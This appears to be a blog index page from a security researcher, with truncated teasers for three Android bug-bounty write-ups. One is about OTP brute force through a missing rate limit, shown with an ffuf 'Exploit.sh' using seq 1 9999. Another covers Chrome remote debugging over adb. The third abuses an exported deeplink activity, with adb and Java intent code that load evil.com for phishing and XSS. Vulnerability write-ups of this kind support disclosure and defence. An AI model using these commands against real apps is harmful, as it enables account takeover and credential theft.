balooz@home:~$

  • Android No Rate Limiting Leads To Sms Brute Force

    Android No Rate Limiting Leads to Mass SMS Brute-Force. Endpoint requesting an OTP, but the problem is there is no rate limiting: we can request unlimited OTPs. I crafted a ffuf request to make it fast and easier. Exploit.sh: #! /bin/bash seq 1 9999 | ffuf -u https://sub.redacted.com/api/v2/otp \ -H 'accessToken:9CaeE1dbeMDfUw...'...

  • Android Chrome Remote Debugging

    Android Chrome remote debugging. Install Chrome on Android, then connect to the Android device from the PC through adb; you can connect wirelessly or wired (USB cable). Install an adb root apk to connect wirelessly (requires root): adb connect 192.168.0.100. From the PC navigate to chrome://inspect. From Android browse any...

  • Android App Loading Arbitrary Url Leads To Xss And Phishing

    The app can be launched by any other app because its deeplink activity is exported=true. Adb exploit: adb shell am start -a android.intent.action.VIEW -n com.redacted.android/"com.redacted.activities.DeepLinkActivity" -d "https://evil.com". Apk exploit: Intent intent = new Intent(); intent.setClassName("com.redacted.android","com.redacted.android.activities.DeepLinkActivity"); intent.setData(Uri.parse("https://evil.com")); startActivity(intent); Impact: the attacker can craft a phishing page and grab the credentials, or...